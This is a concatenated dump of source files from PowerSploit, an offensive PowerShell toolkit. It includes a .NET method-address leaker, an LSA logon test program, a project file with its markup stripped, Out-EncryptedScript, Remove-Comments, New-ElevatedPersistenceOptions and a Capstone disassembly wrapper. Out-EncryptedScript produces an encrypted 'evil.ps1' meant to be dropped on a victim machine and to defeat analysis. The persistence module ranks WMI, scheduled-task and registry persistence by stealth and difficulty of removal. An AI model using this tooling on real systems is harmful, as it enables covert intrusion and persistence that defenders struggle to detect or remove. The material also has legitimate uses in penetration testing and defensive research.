StealthCloseFile(FileInfo_t* fileInfo) 156 | { 157 | delete (fileInfo->data); 158 | delete (fileInfo->indexEntry); 159 | delete (fileInfo->volume); 160 | delete fileInfo; 161 | } 162 | -------------------------------------------------------------------------------- /ReverseEngineering/Get-MethodAddress.ps1: -------------------------------------------------------------------------------- 1 | function Get-MethodAddress 2 | { 
3 | <# 4 | .SYNOPSIS 5 | 6 | Get the unmanaged function address of a .NET method. 7 | 8 | PowerSploit Function: Get-MethodAddress 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | Get-MethodAddress aids in the process of reverse engineering and exploitation by returning an unmanaged function pointer to any .NET method. This method is useful for those interested in seeing what JITed MSIL opcodes look like in their assembly language representation. 17 | 18 | For example, here is the MSIL representation of [System.IntPtr].ToPointer: 19 | 0x02 ldarg.0 20 | 0x7B,0x53,0x04,0x00,0x04 ldfld void* System.IntPtr::m_value 21 | 0x2A ret 22 | 23 | After calling Get-MethodAddress and inspecting it in WinDbg, here is the x86_64 ASM representation: 24 | C:\PS> Get-MethodAddress ([IntPtr].GetMethod('ToPointer')) 25 | 0x000007FF35544CC0 26 | 27 | mscorlib_ni+0xd04cc0: 28 | 000007ff`35544cc0 488b01 mov rax,qword ptr [rcx] 29 | 000007ff`35544cc3 c3 ret 30 | 000007ff`35544cc4 cc int 3 31 | 32 | This MSIL to ASM translation makes sense because all the assembly instructions are doing is dereferencing the pointer in rcx. 33 | 34 | .PARAMETER MethodInfo 35 | 36 | The method whose unmanaged address will be returned. 37 | 38 | .EXAMPLE 39 | 40 | C:\PS> Get-MethodAddress ([String].GetMethod('Trim', [Type[]]@())) 41 | 42 | Description 43 | ----------- 44 | Returns the unmanaged address of [System.Object].Trim() method. 45 | 46 | .EXAMPLE 47 | 48 | C:\PS> [Int].Module.GetTypes().GetMethods() | ForEach-Object {Get-MethodAddress $_ -ErrorAction SilentlyContinue -WarningAction SilentlyContinue} 49 | 50 | Description 51 | ----------- 52 | Returns an unmanaged address for every method (in which an address can be returned) in mscorlib. 53 | 54 | .OUTPUTS 55 | 56 | System.String 57 | 58 | A hexadecimal representation of the method address. 
59 | 60 | .NOTES 61 | 62 | Not all methods will be able to return an address. For example, methods with implementation flags of AggressiveInlining, Synchronized, or CodeTypeMask will not return an address. Also note that any InternalCall method will return the same pointer every time because the CLR determines its address at runtime. 63 | 64 | Lastly, note that the MSIL opcodes used to implement this cmdlet are unverifiable. This means for example, that this technique won't aid exploiting Silverlight applications. :'( 65 | 66 | .LINK 67 | 68 | http://www.exploit-monday.com/2012/11/Get-MethodAddress.html 69 | #> 70 | 71 | [CmdletBinding()] Param ( 72 | [Parameter(Mandatory = $True, ValueFromPipeline = $True)] 73 | [System.Reflection.MethodInfo] 74 | $MethodInfo 75 | ) 76 | 77 | if ($MethodInfo.MethodImplementationFlags -eq 'InternalCall') 78 | { 79 | Write-Warning "$($MethodInfo.Name) is an InternalCall method. These methods always point to the same address." 80 | } 81 | 82 | if ([IntPtr]::Size -eq 4) 83 | { 84 | $ReturnType = [UInt32] 85 | } 86 | else 87 | { 88 | $ReturnType = [UInt64] 89 | } 90 | 91 | $Domain = [AppDomain]::CurrentDomain 92 | $DynAssembly = New-Object System.Reflection.AssemblyName('MethodLeakAssembly') 93 | # Assemble in memory 94 | $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) 95 | $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('MethodLeakModule') 96 | $TypeBuilder = $ModuleBuilder.DefineType('MethodLeaker', [System.Reflection.TypeAttributes]::Public) 97 | # Declaration of the LeakMethod method 98 | $MethodBuilder = $TypeBuilder.DefineMethod('LeakMethod', [System.Reflection.MethodAttributes]::Public -bOr [System.Reflection.MethodAttributes]::Static, $ReturnType, $null) 99 | $Generator = $MethodBuilder.GetILGenerator() 100 | 101 | # Push unmanaged pointer to MethodInfo onto the evaluation stack 102 | $Generator.Emit([System.Reflection.Emit.OpCodes]::Ldftn, $MethodInfo) 
103 | $Generator.Emit([System.Reflection.Emit.OpCodes]::Ret) 104 | 105 | # Assemble everything 106 | $Type = $TypeBuilder.CreateType() 107 | $Method = $Type.GetMethod('LeakMethod') 108 | 109 | try 110 | { 111 | # Call the method and return its JITed address 112 | $Address = $Method.Invoke($null, @()) 113 | 114 | Write-Output (New-Object IntPtr -ArgumentList $Address) 115 | } 116 | catch [System.Management.Automation.MethodInvocationException] 117 | { 118 | Write-Error "$($MethodInfo.Name) cannot return an unmanaged address." 119 | } 120 | } 121 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | 14 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3} 15 | Win32Proj 16 | ExeToInjectInTo 17 | 18 | 19 | 20 | Application 21 | true 22 | v110 23 | Unicode 24 | 25 | 26 | Application 27 | false 28 | v110 29 | true 30 | Unicode 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | true 44 | 45 | 46 | false 47 | 48 | 49 | 50 | Use 51 | Level3 52 | Disabled 53 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 54 | true 55 | 56 | 57 | Console 58 | true 59 | 60 | 61 | 62 | 63 | Level3 64 | Use 65 | MaxSpeed 66 | true 67 | true 68 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 69 | true 70 | 71 | 72 | Console 73 | true 74 | true 75 | true 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | Create 89 | Create 90 | 91 | 92 | 93 | 94 | 95 | -------------------------------------------------------------------------------- /Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.cpp: -------------------------------------------------------------------------------- 1 | // LogonUser.cpp : Defines the entry point for the console application. 
2 | // 3 | 4 | #include "stdafx.h" 5 | 6 | using namespace std; 7 | 8 | size_t wcsByteLen( const wchar_t* str ); 9 | void InitUnicodeString( UNICODE_STRING& str, const wchar_t* value, BYTE* buffer, size_t& offset ); 10 | PVOID CreateNtlmLogonStructure(wstring domain, wstring username, wstring password, DWORD* size); 11 | size_t WriteUnicodeString(wstring str, UNICODE_STRING* uniStr, PVOID baseAddress, size_t offset); 12 | 13 | int _tmain(int argc, _TCHAR* argv[]) 14 | { 15 | //Get a handle to LSA 16 | HANDLE hLSA = NULL; 17 | NTSTATUS status = LsaConnectUntrusted(&hLSA); 18 | if (status != 0) 19 | { 20 | cout << "Error calling LsaConnectUntrusted. Error code: " << status << endl; 21 | return -1; 22 | } 23 | if (hLSA == NULL) 24 | { 25 | cout << "hLSA is NULL, this shouldn't ever happen" << endl; 26 | return -1; 27 | } 28 | 29 | //Build LsaLogonUser parameters 30 | LSA_STRING originName = {}; 31 | char originNameStr[] = "qpqp"; 32 | originName.Buffer = originNameStr; 33 | originName.Length = (USHORT)strlen(originNameStr); 34 | originName.MaximumLength = originName.Length; 35 | 36 | ULONG authPackage = 0; 37 | PLSA_STRING authPackageName = new LSA_STRING(); 38 | char authPackageBuf[] = MSV1_0_PACKAGE_NAME; 39 | authPackageName->Buffer = authPackageBuf; 40 | authPackageName->Length = (USHORT)strlen(authPackageBuf); 41 | authPackageName->MaximumLength = (USHORT)strlen(authPackageBuf); 42 | status = LsaLookupAuthenticationPackage(hLSA, authPackageName, &authPackage); 43 | if (status != 0) 44 | { 45 | int winError = LsaNtStatusToWinError(status); 46 | cout << "Call to LsaLookupAuthenticationPackage failed. 
Error code: " << winError; 47 | return -1; 48 | } 49 | 50 | DWORD authBufferSize = 0; 51 | PVOID authBuffer = CreateNtlmLogonStructure(L"VMWORKSTATION", L"testuser", L"Password1", &authBufferSize); 52 | cout << "authBufferSize: " << authBufferSize << endl; 53 | 54 | //Get TokenSource 55 | HANDLE hProcess = GetCurrentProcess();//todo 56 | HANDLE procToken = NULL; 57 | BOOL success = OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &procToken); 58 | if (!success) 59 | { 60 | DWORD errorCode = GetLastError(); 61 | cout << "Call to OpenProcessToken failed. Errorcode: " << errorCode << endl; 62 | return -1; 63 | } 64 | 65 | TOKEN_SOURCE tokenSource = {}; 66 | DWORD realSize = 0; 67 | success = GetTokenInformation(procToken, TokenSource, &tokenSource, sizeof(tokenSource), &realSize); 68 | if (!success) 69 | { 70 | cout << "Call to GetTokenInformation failed." << endl; 71 | return -1; 72 | } 73 | 74 | 75 | //Misc 76 | PVOID profileBuffer = NULL; 77 | ULONG profileBufferSize = 0; 78 | LUID loginId; 79 | HANDLE token = NULL; 80 | QUOTA_LIMITS quotaLimits; 81 | NTSTATUS subStatus = 0; 82 | 83 | status = LsaLogonUser(hLSA, 84 | &originName, 85 | RemoteInteractive, 86 | authPackage, 87 | authBuffer, 88 | authBufferSize, 89 | 0, 90 | &tokenSource, 91 | &profileBuffer, 92 | &profileBufferSize, 93 | &loginId, 94 | &token, 95 | "aLimits, 96 | &subStatus); 97 | 98 | if (status != 0) 99 | { 100 | NTSTATUS winError = LsaNtStatusToWinError(status); 101 | cout << "Error calling LsaLogonUser. Error code: " << winError << endl; 102 | return -1; 103 | } 104 | 105 | cout << "Success!" 
<< endl; 106 | 107 | return 1; 108 | } 109 | 110 | //size will be set to the size of the structure created 111 | PVOID CreateNtlmLogonStructure(wstring domain, wstring username, wstring password, DWORD* size) 112 | { 113 | size_t wcharSize = sizeof(wchar_t); 114 | 115 | size_t totalSize = sizeof(MSV1_0_INTERACTIVE_LOGON) + ((domain.length() + username.length() + password.length()) * wcharSize); 116 | MSV1_0_INTERACTIVE_LOGON* ntlmLogon = (PMSV1_0_INTERACTIVE_LOGON)(new BYTE[totalSize]); 117 | size_t offset = sizeof(MSV1_0_INTERACTIVE_LOGON); 118 | 119 | ntlmLogon->MessageType = MsV1_0InteractiveLogon; 120 | offset += WriteUnicodeString(domain, &(ntlmLogon->LogonDomainName), ntlmLogon, offset); 121 | offset += WriteUnicodeString(username, &(ntlmLogon->UserName), ntlmLogon, offset); 122 | offset += WriteUnicodeString(password, &(ntlmLogon->Password), ntlmLogon, offset); 123 | 124 | *size = (DWORD)totalSize; //If the size is bigger than a DWORD, there is a gigantic bug somewhere. 125 | return ntlmLogon; 126 | } 127 | 128 | size_t WriteUnicodeString(wstring str, UNICODE_STRING* uniStr, PVOID baseAddress, size_t offset) 129 | { 130 | const wchar_t* buffer = str.c_str(); 131 | size_t size = str.length() * sizeof(wchar_t); 132 | uniStr->Length = (USHORT)size; 133 | uniStr->MaximumLength = (USHORT)size; 134 | uniStr->Buffer = (PWSTR)((UINT_PTR)baseAddress + offset); 135 | memcpy((PVOID)((UINT_PTR)baseAddress + offset), str.c_str(), size); 136 | return size; 137 | } -------------------------------------------------------------------------------- /ScriptModification/Out-EncryptedScript.ps1: -------------------------------------------------------------------------------- 1 | function Out-EncryptedScript 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Encrypts text files/scripts. 
7 | 8 | PowerSploit Function: Out-EncryptedScript 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | Out-EncryptedScript will encrypt a script (or any text file for that matter) and output the results to a minimally obfuscated script - evil.ps1. 17 | 18 | .PARAMETER ScriptPath 19 | 20 | Path to this script 21 | 22 | .PARAMETER Password 23 | 24 | Password to encrypt/decrypt the script 25 | 26 | .PARAMETER Salt 27 | 28 | Salt value for encryption/decryption. This can be any string value. 29 | 30 | .EXAMPLE 31 | 32 | C:\PS> Out-EncryptedScript .\Naughty-Script.ps1 password salty 33 | 34 | Description 35 | ----------- 36 | Encrypt the contents of this file with a password and salt. This will make analysis of the script impossible without the correct password and salt combination. This command will generate evil.ps1 that can dropped onto the victim machine. It only consists of a decryption function 'de' and the base64-encoded ciphertext. 37 | 38 | .EXAMPLE 39 | 40 | C:\PS> [String] $cmd = Get-Content .\evil.ps1 41 | C:\PS> Invoke-Expression $cmd 42 | C:\PS> $decrypted = de password salt 43 | C:\PS> Invoke-Expression $decrypted 44 | 45 | Description 46 | ----------- 47 | This series of instructions assumes you've already encrypted a script and named it evil.ps1. 
The contents are then decrypted and the unencrypted script is called via Invoke-Expression 48 | 49 | .NOTES 50 | 51 | This command can be used to encrypt any text-based file/script 52 | 53 | .LINK 54 | 55 | http://www.exploit-monday.com 56 | #> 57 | 58 | [CmdletBinding()] Param ( 59 | [Parameter(Position = 0, Mandatory = $True)] 60 | [String] 61 | $ScriptPath, 62 | 63 | [Parameter(Position = 1, Mandatory = $True)] 64 | [String] 65 | $Password, 66 | 67 | [Parameter(Position = 2, Mandatory = $True)] 68 | [String] 69 | $Salt, 70 | 71 | [Parameter(Position = 3)] 72 | [String] 73 | $InitializationVector = ( @( foreach ($i in 1..16) { [Char](Get-Random -Min 0x41 -Max 0x5B) } ) -join '' ), # Generate random 16 character IV. NOTE: this value is currently never used; the encryptor below uses the fixed IV "CRACKMEIFYOUCAN!" (also hard-coded in the emitted decrypt function), so the same input, password and salt always yield the same ciphertext. 74 | 75 | [Parameter(Position = 4)] 76 | [String] 77 | $FilePath = '.\evil.ps1' 78 | ) 79 | 80 | $AsciiEncoder = New-Object System.Text.ASCIIEncoding 81 | $ivBytes = $AsciiEncoder.GetBytes("CRACKMEIFYOUCAN!") 82 | # While this can be used to encrypt any file, it's primarily designed to encrypt itself. 83 | [Byte[]] $scriptBytes = Get-Content -Encoding byte -Path $ScriptPath 84 | $DerivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($Password, $AsciiEncoder.GetBytes($Salt), "SHA1", 2) 85 | $Key = New-Object System.Security.Cryptography.RijndaelManaged 86 | $Key.Mode = [System.Security.Cryptography.CipherMode]::CBC 87 | [Byte[]] $KeyBytes = $DerivedPass.GetBytes(32) 88 | $Encryptor = $Key.CreateEncryptor($KeyBytes, $ivBytes) 89 | $MemStream = New-Object System.IO.MemoryStream 90 | $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($MemStream, $Encryptor, [System.Security.Cryptography.CryptoStreamMode]::Write) 91 | $CryptoStream.Write($scriptBytes, 0, $scriptBytes.Length) 92 | $CryptoStream.FlushFinalBlock() 93 | $CipherTextBytes = $MemStream.ToArray() 94 | $MemStream.Close() 95 | $CryptoStream.Close() 96 | $Key.Clear() 97 | $Cipher = [Convert]::ToBase64String($CipherTextBytes) 98 | 99 | # Generate encrypted PS1 file. 
All that will be included is the base64-encoded ciphertext and a slightly 'obfuscated' decrypt function 100 | $Output = 'function de([String] $b, [String] $c) 101 | { 102 | $a = "' 103 | $Output += $cipher 104 | $Output += '"' 105 | $Output += '; 106 | $encoding = New-Object System.Text.ASCIIEncoding; 107 | $dd = $encoding.GetBytes("CRACKMEIFYOUCAN!"); 108 | $aa = [Convert]::FromBase64String($a); 109 | $derivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($b, $encoding.GetBytes($c), "SHA1", 2); 110 | [Byte[]] $e = $derivedPass.GetBytes(32); 111 | $f = New-Object System.Security.Cryptography.RijndaelManaged; 112 | $f.Mode = [System.Security.Cryptography.CipherMode]::CBC; 113 | [Byte[]] $h = New-Object Byte[]($aa.Length); 114 | $g = $f.CreateDecryptor($e, $dd); 115 | $i = New-Object System.IO.MemoryStream($aa, $True); 116 | $j = New-Object System.Security.Cryptography.CryptoStream($i, $g, [System.Security.Cryptography.CryptoStreamMode]::Read); 117 | $r = $j.Read($h, 0, $h.Length); 118 | $i.Close(); 119 | $j.Close(); 120 | $f.Clear(); 121 | return $encoding.GetString($h,0,$h.Length); 122 | }' 123 | 124 | # Output decrypt function and ciphertext to evil.ps1 125 | Out-File -InputObject $Output -Encoding ASCII $FilePath 126 | 127 | Write-Verbose "Encrypted PS1 file saved to: $(Resolve-Path $FilePath)" 128 | 129 | } 130 | -------------------------------------------------------------------------------- /ScriptModification/Remove-Comments.ps1: -------------------------------------------------------------------------------- 1 | function Remove-Comments 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Strips comments and extra whitespace from a script. 7 | 8 | PowerSploit Function: Remove-Comments 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | Remove-Comments strips out comments and unnecessary whitespace from a script. 
This is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big. 17 | 18 | A major portion of this code was taken from the Lee Holmes' Show-ColorizedContent script. You rock, Lee! 19 | 20 | .PARAMETER ScriptBlock 21 | 22 | Specifies a scriptblock containing your script. 23 | 24 | .PARAMETER Path 25 | 26 | Specifies the path to your script. 27 | 28 | .EXAMPLE 29 | 30 | C:\PS> $Stripped = Remove-Comments -Path .\ScriptWithComments.ps1 31 | 32 | .EXAMPLE 33 | 34 | C:\PS> Remove-Comments -ScriptBlock { 35 | ### This is my awesome script. My documentation is beyond reproach! 36 | Write-Host 'Hello, World!' ### Write 'Hello, World' to the host 37 | ### End script awesomeness 38 | } 39 | 40 | Write-Host 'Hello, World!' 41 | 42 | .EXAMPLE 43 | 44 | C:\PS> Remove-Comments -Path Inject-Shellcode.ps1 | Out-EncodedCommand 45 | 46 | Description 47 | ----------- 48 | Removes extraneous whitespace and comments from Inject-Shellcode (which is notoriously large) and pipes the output to Out-EncodedCommand. 49 | 50 | .INPUTS 51 | 52 | System.String, System.Management.Automation.ScriptBlock 53 | 54 | Accepts either a string containing the path to a script or a scriptblock. 55 | 56 | .OUTPUTS 57 | 58 | System.Management.Automation.ScriptBlock 59 | 60 | Remove-Comments returns a scriptblock. Call the ToString method to convert a scriptblock to a string, if desired. 
61 | 62 | .LINK 63 | 64 | http://www.exploit-monday.com 65 | http://www.leeholmes.com/blog/2007/11/07/syntax-highlighting-in-powershell/ 66 | #> 67 | 68 | [CmdletBinding( DefaultParameterSetName = 'FilePath' )] Param ( 69 | [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'FilePath' )] 70 | [ValidateNotNullOrEmpty()] 71 | [String] 72 | $Path, 73 | 74 | [Parameter(Position = 0, ValueFromPipeline = $True, Mandatory = $True, ParameterSetName = 'ScriptBlock' )] 75 | [ValidateNotNullOrEmpty()] 76 | [ScriptBlock] 77 | $ScriptBlock 78 | ) 79 | 80 | Set-StrictMode -Version 2 81 | 82 | if ($PSBoundParameters['Path']) 83 | { 84 | Get-ChildItem $Path -ErrorAction Stop | Out-Null 85 | $ScriptBlockString = [IO.File]::ReadAllText((Resolve-Path $Path)) 86 | $ScriptBlock = [ScriptBlock]::Create($ScriptBlockString) 87 | } 88 | else 89 | { 90 | # Convert the scriptblock to a string so that it can be referenced with array notation 91 | $ScriptBlockString = $ScriptBlock.ToString() 92 | } 93 | 94 | # Tokenize the scriptblock and return all tokens except for comments 95 | $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptBlock, [Ref] $Null) | Where-Object { $_.Type -ne 'Comment' } 96 | 97 | $StringBuilder = New-Object Text.StringBuilder 98 | 99 | # The majority of the remaining code comes from Lee Holmes' Show-ColorizedContent script. 100 | $CurrentColumn = 1 101 | $NewlineCount = 0 102 | foreach($CurrentToken in $Tokens) 103 | { 104 | # Now output the token 105 | if(($CurrentToken.Type -eq 'NewLine') -or ($CurrentToken.Type -eq 'LineContinuation')) 106 | { 107 | $CurrentColumn = 1 108 | # Only insert a single newline. Sequential newlines are ignored in order to save space. 
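# … continuation of Remove-Comments (the function begins above this chunk; code below kept as-is, only re-indented) …
            if ($NewlineCount -eq 0)
            {
                $StringBuilder.AppendLine() | Out-Null
            }
            $NewlineCount++
        }
        else
        {
            $NewlineCount = 0

            # Do any indenting
            if($CurrentColumn -lt $CurrentToken.StartColumn)
            {
                # Insert a single space in between tokens on the same line. Extraneous whiltespace is ignored.
                if ($CurrentColumn -ne 1)
                {
                    $StringBuilder.Append(' ') | Out-Null
                }
            }

            # See where the token ends
            $CurrentTokenEnd = $CurrentToken.Start + $CurrentToken.Length - 1

            # Handle the line numbering for multi-line strings
            if(($CurrentToken.Type -eq 'String') -and ($CurrentToken.EndLine -gt $CurrentToken.StartLine))
            {
                $LineCounter = $CurrentToken.StartLine
                $StringLines = $(-join $ScriptBlockString[$CurrentToken.Start..$CurrentTokenEnd] -split '`r`n')

                foreach($StringLine in $StringLines)
                {
                    $StringBuilder.Append($StringLine) | Out-Null
                    $LineCounter++
                }
            }
            # Write out a regular token
            else
            {
                $StringBuilder.Append((-join $ScriptBlockString[$CurrentToken.Start..$CurrentTokenEnd])) | Out-Null
            }

            # Update our position in the column
            $CurrentColumn = $CurrentToken.EndColumn
        }
    }

    Write-Output ([ScriptBlock]::Create($StringBuilder.ToString()))
}
--------------------------------------------------------------------------------
/Persistence/New-ElevatedPersistenceOptions.ps1:
--------------------------------------------------------------------------------
function New-ElevatedPersistenceOptions
{
<#
.SYNOPSIS

Configure elevated persistence options for the Add-Persistence function.

PowerSploit Function: New-ElevatedPersistenceOptions
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION

New-ElevatedPersistenceOptions allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persistence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry.

This function performs no changes to the system; it only validates the switch combination (via parameter sets) and returns a PowerSploit.Persistence.ElevatedPersistenceOptions object with Method, Trigger and Time properties.

.PARAMETER PermanentWMI

Persist via a permanent WMI event subscription. This option will be the most difficult to detect and remove.

Detection Difficulty: Difficult
Removal Difficulty: Difficult
User Detectable? No

.PARAMETER ScheduledTask

Persist via a scheduled task.

Detection Difficulty: Moderate
Removal Difficulty: Moderate
User Detectable? No

.PARAMETER Registry

Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user. This method only supports the -AtLogon trigger.

Detection Difficulty: Easy
Removal Difficulty: Easy
User Detectable? Yes

.PARAMETER AtLogon

Starts the payload upon any user logon.

.PARAMETER AtStartup

Starts the payload within 240 and 325 seconds of computer startup.

.PARAMETER OnIdle

Starts the payload after one minute of idling.

.PARAMETER Daily

Starts the payload daily.

.PARAMETER At

Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.

.EXAMPLE

C:\PS> $ElevatedOptions = New-ElevatedPersistenceOptions -PermanentWMI -Daily -At '3 PM'

.EXAMPLE

C:\PS> $ElevatedOptions = New-ElevatedPersistenceOptions -Registry -AtLogon

.EXAMPLE

C:\PS> $ElevatedOptions = New-ElevatedPersistenceOptions -ScheduledTask -OnIdle

.OUTPUTS

PowerSploit.Persistence.ElevatedPersistenceOptions

A PSObject with Method ('PermanentWMI', 'ScheduledTask' or 'Registry'), Trigger ('AtStartup', 'Daily', 'AtLogon' or 'OnIdle') and Time (the -At value for Daily triggers, otherwise an empty string).

.LINK

http://www.exploit-monday.com
#>

    # Each parameter set names exactly one valid Method/Trigger combination; the binder
    # rejects anything else, so the switch below needs no default case.
    [CmdletBinding()] Param (
        [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )]
        [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )]
        [Switch]
        $PermanentWMI,

        [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
        [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]
        [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]
        [Switch]
        $ScheduledTask,

        [Parameter( ParameterSetName = 'Registry', Mandatory = $True )]
        [Switch]
        $Registry,

        [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )]
        [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
        [Switch]
        $Daily,

        [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )]
        [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
        [DateTime]
        $At,

        [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]
        [Switch]
        $OnIdle,

        # The Registry set carries only this trigger switch, so Registry is always AtLogon.
        [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]
        [Parameter( ParameterSetName = 'Registry', Mandatory = $True )]
        [Switch]
        $AtLogon,

        [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )]
        [Switch]
        $AtStartup
    )

    # Normalized shape consumed by Add-Persistence. Time is only populated for Daily
    # triggers and stays an empty string otherwise.
    $PersistenceOptionsTable = @{
        Method = ''
        Trigger = ''
        Time = ''
    }

    switch ($PSCmdlet.ParameterSetName)
    {
        'PermanentWMIAtStartup'
        {
            $PersistenceOptionsTable['Method'] = 'PermanentWMI'
            $PersistenceOptionsTable['Trigger'] = 'AtStartup'
        }

        'PermanentWMIDaily'
        {
            $PersistenceOptionsTable['Method'] = 'PermanentWMI'
            $PersistenceOptionsTable['Trigger'] = 'Daily'
            $PersistenceOptionsTable['Time'] = $At
        }

        'ScheduledTaskAtLogon'
        {
            $PersistenceOptionsTable['Method'] = 'ScheduledTask'
            $PersistenceOptionsTable['Trigger'] = 'AtLogon'
        }

        'ScheduledTaskOnIdle'
        {
            $PersistenceOptionsTable['Method'] = 'ScheduledTask'
            $PersistenceOptionsTable['Trigger'] = 'OnIdle'
        }

        'ScheduledTaskDaily'
        {
            $PersistenceOptionsTable['Method'] = 'ScheduledTask'
            $PersistenceOptionsTable['Trigger'] = 'Daily'
            $PersistenceOptionsTable['Time'] = $At
        }

        'Registry'
        {
            $PersistenceOptionsTable['Method'] = 'Registry'
            $PersistenceOptionsTable['Trigger'] = 'AtLogon'
        }
    }

    # Tag the object with a custom type name so Add-Persistence (and format files) can
    # recognize it; the underlying object is a plain PSObject.
    $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable
    $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.ElevatedPersistenceOptions'

    Write-Output $PersistenceOptions
}
--------------------------------------------------------------------------------
/Capstone/Capstone.psm1:
--------------------------------------------------------------------------------
#Requires -Modules Capstone

function Get-CSDisassembly
{
<#
.SYNOPSIS

Disassembles a byte array using the Capstone Engine disassembly framework.

PowerSploit Function: Get-CSDisassembly
Author: Matthew Graeber (@mattifestation)
License: See LICENSE.TXT
Required Dependencies: lib\capstone.dll, lib\[x86|x64]\libcapstone.dll
Optional Dependencies: None

.DESCRIPTION

Get-CSDisassembly is compatible on 32 and 64-bit.

The managed binding (capstone.dll) and the native engine (libcapstone.dll) are checked for a matching version before any bytes are disassembled; a mismatch is reported with Write-Error. Pass -ErrorAction Stop to treat that mismatch as fatal.

.PARAMETER Architecture

Specifies the architecture of the code to be disassembled.

.PARAMETER Mode

Specifies the mode in which to disassemble code. For example, to disassemble Amd64 code, architecture is set to 'X86' and Mode is set to 'MODE_64'.

.PARAMETER Code

A byte array consisting of the code to be disassembled.

.PARAMETER Offset

Specifies the starting address of the disassembly listing.

.PARAMETER Count

Specifies the maximum number of instructions to disassemble.

.PARAMETER Syntax

Specifies the syntax flavor to be used (INTEL vs. ATT).

.PARAMETER DetailOn

Specifies that detailed parsing should be performed - i.e. provide detailed information for each disassembled instruction.

.PARAMETER Version

Prints the running Capstone Framework version.

.EXAMPLE

$Bytes = [Byte[]] @( 0x8D, 0x4C, 0x32, 0x08, 0x01, 0xD8, 0x81, 0xC6, 0x34, 0x12, 0x00, 0x00 )
Get-CSDisassembly -Architecture X86 -Mode Mode16 -Code $Bytes -Offset 0x1000

$Bytes = [Byte[]] @( 0x8D, 0x4C, 0x32, 0x08, 0x01, 0xD8, 0x81, 0xC6, 0x34, 0x12, 0x00, 0x00 )
Get-CSDisassembly -Architecture X86 -Mode Mode32 -Code $Bytes

$Bytes = [Byte[]] @( 0x8D, 0x4C, 0x32, 0x08, 0x01, 0xD8, 0x81, 0xC6, 0x34, 0x12, 0x00, 0x00 )
Get-CSDisassembly -Architecture X86 -Mode Mode32 -Code $Bytes -Syntax ATT

$Bytes = [Byte[]] @( 0x55, 0x48, 0x8b, 0x05, 0xb8, 0x13, 0x00, 0x00 )
Get-CSDisassembly -Architecture X86 -Mode Mode64 -Code $Bytes -DetailOn

$Bytes = [Byte[]] @( 0xED, 0xFF, 0xFF, 0xEB, 0x04, 0xe0, 0x2d, 0xe5, 0x00, 0x00, 0x00, 0x00, 0xe0, 0x83, 0x22, 0xe5, 0xf1, 0x02, 0x03, 0x0e, 0x00, 0x00, 0xa0, 0xe3, 0x02, 0x30, 0xc1, 0xe7, 0x00, 0x00, 0x53, 0xe3 )
Get-CSDisassembly -Architecture Arm -Mode Arm -Code $Bytes

$Bytes = [Byte[]] @( 0x4f, 0xf0, 0x00, 0x01, 0xbd, 0xe8, 0x00, 0x88, 0xd1, 0xe8, 0x00, 0xf0 )
Get-CSDisassembly -Architecture Arm -Mode Thumb -Code $Bytes

$Bytes = [Byte[]] @( 0x10, 0xf1, 0x10, 0xe7, 0x11, 0xf2, 0x31, 0xe7, 0xdc, 0xa1, 0x2e, 0xf3, 0xe8, 0x4e, 0x62, 0xf3 )
Get-CSDisassembly -Architecture Arm -Mode Arm -Code $Bytes

$Bytes = [Byte[]] @( 0x70, 0x47, 0xeb, 0x46, 0x83, 0xb0, 0xc9, 0x68 )
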